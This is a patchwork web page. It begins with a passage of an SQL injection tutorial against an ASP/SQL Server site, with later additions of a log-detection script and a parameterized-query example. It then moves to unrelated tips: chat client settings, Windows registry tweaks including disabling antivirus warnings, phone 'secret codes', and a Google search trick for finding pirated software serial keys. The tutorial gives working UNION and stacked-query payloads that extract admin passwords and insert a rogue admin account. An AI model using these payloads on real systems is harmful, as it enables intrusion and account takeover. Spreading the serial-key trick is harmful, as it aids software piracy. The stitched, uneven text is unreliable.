Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters between 0-9 only). Let us say we are trying to get the password of "trinity", which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append any text we want to the password. (The ASCII code for '+' is 0x2b.) We will append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. When we manually call the convert() function to convert '31173 morpheus' into an integer, SQL Server will throw an ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
Once we have gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".
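The requests shown in the sections above leave recognizable traces in a web server's access log, and the error-based ones also produce a run of server errors. The following is an added detection example, not part of the original tutorial: the log format, the sample lines, and the rule names are constructed for illustration, and the patterns cover only the request shapes this page shows.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed log lines: date time client method request-target status.
SAMPLE_LOG = """\
2003-01-10 09:14:02 192.0.2.10 GET /index.asp?category=food 200
2003-01-10 09:14:40 192.0.2.10 GET /search.asp?q=salt+or+pepper 200
2003-01-10 09:20:11 192.0.2.66 GET /index.asp?category=food%27%20or%201=1-- 200
2003-01-10 09:21:37 192.0.2.66 GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
2003-01-10 09:25:03 192.0.2.66 GET /index.asp?id=10;%20exec%20master..xp_cmdshell%20%27ping%2010.10.1.2%27-- 500
""".splitlines()

# One rule per request shape described on this page (rule names are hypothetical).
RULES = {
    # quote or paren, then OR, then an always-true comparison: ' or 1=1, ') or ('a'='a
    "tautology": re.compile(r"""['")]\s*or\s*\(?\s*['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I),
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    # a semicolon that starts a second statement
    "stacked_statement": re.compile(r";\s*(?:exec|update|insert|delete|drop)\b", re.I),
    "dangerous_proc": re.compile(r"\b(?:xp_cmdshell|sp_makewebtask)\b", re.I),
}

def match_rules(target):
    """Percent-decode the query string once and return the names of matching rules."""
    query = unquote_plus(urlsplit(target).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def scan(lines):
    """Return (client, status, rules) for every log line whose query matches a rule."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 6:
            continue  # skip lines that are not in the constructed format
        _date, _time, client, _method, target, status = parts
        rules = match_rules(target)
        if rules:
            hits.append((client, int(status), rules))
    return hits

def clients_with_error_hits(hits):
    """Clients whose matching requests got a 5xx, the signal of error-based probing."""
    return sorted({client for client, status, _rules in hits if status >= 500})

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print("review first:", clients_with_error_hits(scan(SAMPLE_LOG)))
```

Pattern matching on logs is a detection aid only; it does not replace fixing the query construction in the application.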

8.0 How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For a numeric value, convert it to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
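The concatenated query from section 3 can be placed beside a version that binds the value as a parameter, so the injected text is compared as data instead of being parsed as SQL. This is an added example, not code from the original tutorial: parameter binding is not among the mitigations listed above, Python's sqlite3 stands in for the ASP and MS SQL Server setup, and the function names, the PName column, and the sample rows are assumptions.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the page's 'product' table (rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, PName TEXT, PCategory TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [(10, "apple", "food"), (11, "bread", "food"),
         (12, "hammer", "tools"), (13, "price-list", "internal")],
    )
    return conn

def by_category_concat(conn, v_cat):
    """Same pattern as the page's ASP code: the input becomes part of the SQL text."""
    sqlstr = "SELECT PName FROM product WHERE PCategory='" + v_cat + "'"
    return sorted(row[0] for row in conn.execute(sqlstr))

def by_category_param(conn, v_cat):
    """Hardened form: the value is bound to a placeholder and never parsed as SQL."""
    rows = conn.execute("SELECT PName FROM product WHERE PCategory = ?", (v_cat,))
    return sorted(row[0] for row in rows)

ID_RE = re.compile(r"[0-9]{1,9}")

def parse_id(raw_id):
    """Accept only a short run of ASCII digits; anything else is rejected as None."""
    if isinstance(raw_id, str) and ID_RE.fullmatch(raw_id):
        return int(raw_id)
    return None

def by_id(conn, raw_id):
    """Numeric parameter: validate, convert to int, then bind. None if rejected or absent."""
    item_id = parse_id(raw_id)
    if item_id is None:
        return None
    row = conn.execute("SELECT PName FROM product WHERE id = ?", (item_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    injected = "food' or 1=1--"  # input string taken from the page
    print("concatenated:", by_category_concat(db, injected))
    print("parameterized:", by_category_param(db, injected))
    print("id check:", by_id(db, "10"), by_id(db, "10 UNION SELECT 1--"))
```

With binding in place, the quote filter above becomes a second layer rather than the only barrier, and legitimate values that contain a quote still work.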

Nimbuzz BOMBUS SETTINGS FOR NEW USERS


1] LOGIN SETTINGS

1. Open your Bombus or Bombusmod.
2. username: your id name (don't put @nimbuzz.com)
3. password: your password
4. server: nimbuzz.com
5. host name/ip: openfire.nimbuzz.com
6. port: 5222
7. resource: www.roniksite.co.cc
8. Save your account and connect.


2] CONFERENCE SETTINGS


1. Log in to your Nimbuzz account.
2. Go to the Conference option in Bombus and select new conference.
3. Type the name of the chatroom you want to enter.
4. Type the server [ conference.nimbuzz.com ].
5. Enter the chatroom and enjoy chatting.


3] XML CONSOLE


1. Log in to your Nimbuzz account.
2. Go to Tool --> XML CONSOLE.
3. Enable it.


4] AUTOTRANS2CYR


1. Log in to your Nimbuzz account.
2. Go to Tool -> Option -> mark Autotrans2cyr.
3. With this you can use a stylish font in the respective Bombus.


5] HIDE CLIENT VERSION


1. Log in to your Nimbuzz account.
2. Go to Tool -> Option -> unmark Shared Platform Info.


6] AUTORESPOND


1. Log in to your Nimbuzz account.
2. Go to Status.
3. Then choose EDIT and write your message.
4. Set Priority 100.
5. Mark ENABLE AUTORESPOND.


7] INVISIBLE


1. Log in to your Nimbuzz account.
2. Go to Status.
3. Set Status Invisible.
4. With this you appear offline to your friends.
5. I.e. you are hidden but online.

Modifying Default Desktop Icons


  1. Start Regedit
  2. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ explorer \ Shell Icons
  3. The default icons are numbered in the right panel from 0-40
  4. Double click on the number of the particular icon you want to change. See the chart below.
  5. Enter the name of the icon file you want to use followed by the number of the icon in that file.
    Note: The numbering starts with zero.
  6. If you use a single .ICO file, it should be followed by a 0.
  7. e.g. - filename.dll,4 - This would actually be the 5th icon since it starts with 0.
  8. Make sure you delete the hidden file C:\WINDOWS\SHELLICONCACHE
Below is a reference for the icons I've been able to figure out:
0 - Default Icon
1 - Default Document
2 - Application
3 - Closed Folder
4 - Open Folder
5 - 5 1/4 Drive
6 - 3 1/4 Drive
7 - Removable Drive
8 - Hard Drive
9 - Network Folder
10 - Network Offline
11 - CD
12 - RAM Drive
13 - Entire Network
15 - My Computer
16 - Printer
17 - Network Neighborhood
18 - Network Workgroup
19-27 are the Start Menu icons
19 - Programs
20 - Desktop
21 - Settings
22 - Find
23 - Help
24 - Run
25 - Suspend
27 - Shutdown
28 - Share
29 - Shortcut
31 - Recycle Bin (Empty)
32 - Recycle Bin (Full)
33 - Folder, Dial-Up Networking
34 - Desktop
36 - Program Group
40 - Audio Card
In addition, you can change:
  • My Computer - HKEY_CLASSES_ROOT\ CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
  • Network Neighborhood - HKEY_CLASSES_ROOT\ CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}
  • InBox - HKEY_CLASSES_ROOT\ CLSID\{00020D75-0000-0000-C000-000000000046}
  • Recycle Bin - HKEY_CLASSES_ROOT\ CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

Eliminating the Right Click on the Taskbar


To eliminate the right click on the taskbar:
  1. Start Regedit
  2. Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer
  3. Add a DWORD and give it a name of NoTrayContextMenu
  4. Give it a value of 1
  5. Reboot 

Disable the Security Center warnings


Security is a system of safeguards designed to protect a computer system and important data from damage or access by unauthorized persons. Different antivirus and firewall programs are used to manage the security of the computer. Sometimes this is a built-in antivirus or firewall program in Windows XP that maintains the computer's security. But if your Windows is not provided with any antivirus, firewall program or Automatic Updates, the Windows Security Center will alert you with the message "Your computer may be at risk. Your virus protection status is unknown", along with a useless repeating reminder. You can disable this message permanently by changing the value of “AntiVirusDisableNotify” in the Windows registry.

Follow the given steps to edit the computer registry to disable the message:
  • First click on the Start button, then type Regedit in the Run option.
  • Here navigate to:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
  • Here in the right side panel, double click on AntiVirusDisableNotify and set its value to 1.
  • Now close the registry editor and restart your computer for the changes to go into effect.

Setting the Recycle Bin to Always Delete


The Recycle Bin is a special Windows folder on the hard disk that stores deleted files and folders. These files or folders can be restored from the Recycle Bin to their original location if they are needed again. But you can change the Recycle Bin setting so that files and folders deleted from the hard disk are not placed in the Recycle Bin. So with the help of the Windows registry editor you can set the Recycle Bin to always delete items.
Follow the given steps to edit the computer registry for the Recycle Bin:
  • First click on the Start button, then type Regedit in the Run option.
  • Here navigate to:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\BitBucket
  • Here in the right side panel, double click on NukeOnDelete and set its value to 1. Now close the registry editor and restart your computer for the changes to go into effect.

Turning off the Help on Min, Max, Close Icons


When the mouse goes over the minimize, maximize and close icons on the upper right hand side of a window, you normally get a display telling you what those are for.
To disable that display:
  1. Start Regedit
  2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
  3. Create a String Value called MinMaxClose
  4. Give it a value of 1 
  5. Reboot

Automatic Screen Refresh Tips


When you are working on your local computer, you may want changes in your system to be refreshed automatically. For example, sometimes you are watching sports results, online stock exchange rates or changes to your hard drive, but these changes are not usually refreshed until you press the F5 key on your keyboard.
To refresh your screen automatically you should edit your system registry. But the best practice when editing Windows registry keys is to always export or back up the whole Windows registry to a backup drive before editing, because any mistake in the registry can cause serious problems that stop your computer from running properly.
Follow the given steps to make the updates automatic.

  • First click on the Start button, then type Regedit in the Run option.
  • In the Registry Editor panel go to the path:
  • HKEY_LOCAL_MACHINE / System / CurrentControlSet / Control / UpdateMode
  • Here in the right hand side panel edit the DWORD value to be between 1 and 5.
  • Now restart your computer for the changes to go into effect.

Top secret of Sony Ericsson mobile phones


 

Today's tip is about the secret codes of Sony Ericsson mobile phones. These codes will work on most of the latest Sony Ericsson mobile sets. You can display the hidden information of mobile sets and then troubleshoot routine problems using these codes.
Sony Ericsson Useful Secret Codes
Code                      Action
0#                        To display the last dial number
*#06#                     To display the IMEI Number of the mobile
-> * <- <- * <- *         Use to display the secret menu of Sony mobile
<**<                      Use to display the information about mobile network
< 0 0 0 0 >               Use to reset Sony Ericsson mobile default language
>*<<*<*                   Use to display the mobile software version
<0000>                    Use to reset Sony Ericsson mobile default theme
#                         To display the SIM Number of the mobile
**04*0000*0000*0000#      You can access your mobile settings without SIM card
*#0000#                   Use to reset Sony Ericsson mobile English menu
904060 + >                Use to reset mobile phone settings
904093 + menu             Use to display the CDMA Mode
On/off button             Press and release quickly on/off button to verify the battery status.
> * > (>);                To display the text contained in the phone

Hidden settings of iPhone handsets



Today's tip will help you to play with your iPhone using secret codes. These secret codes will work on most Apple mobile handsets. You can display the hidden information of Apple handsets and troubleshoot routine problems with the help of these codes.

The latest Apple codes are listed below:

Code                      Action
*#06#                     To display the IMEI Number of the mobile
*225#                     Use to display the balance detail of postpaid number
*#43#                     Use to verify if call waiting is enabled
*#61#                     Verify the number for unanswered calls
*#62#                     Verify the number for call forwarding if no service is available.
#67#                      Verify the number for call forwarding if phone is busy
*#646#                    Use to display the minute detail of postpaid number
*777#                     Use to display the balance detail of prepaid number
*3001#12345#*             Display the iphone inner settings
*#33#                     To verify whether barring is enabled or disabled for outgoing
*#21#                     To display the settings for your call forwarding
 

Tutorial Get the serial number you need


* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches:

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR